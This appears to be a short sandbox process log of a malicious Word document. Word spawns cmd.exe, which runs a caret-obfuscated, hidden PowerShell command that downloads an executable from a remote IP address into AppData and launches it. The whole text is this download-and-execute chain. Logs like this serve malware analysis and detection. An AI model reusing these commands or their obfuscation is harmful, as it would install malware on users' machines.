WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\in6-4.doc
1116cmd.exe CMD.exe /C "p^ow^ErshelL^.e^Xe -^ExEcutIO^Np^OLI^CY b^YP^aSs -^no^Pr^OF^ilE -wIn^dO^W^styL^e^ HId^D^en (N^ew-ObJE^C^T SY^STEm.N^Et.^W^EBC^L^IeNt^).DoWn^LOAD^f^i^LE^('http://84.200.4.102/dwpc.exe','%apPdaTA%.exE')^;^S^TaR^t-p^RoCEss '%ApPdata%.eXE'"
1444powershell.exe powErshelL.eXe -ExEcutIONpOLICY bYPaSs -noPrOFilE -wIndOWstyLe HIdDen (New-ObJECT SYSTEm.NEt.WEBCLIeNt).DoWnLOADfiLE('http://84.200.4.102/dwpc.exe','C:\Users\test22\AppData\Roaming.exE');STaRt-pRoCEss 'C:\Users\test22\AppData\Roaming.eXE'
596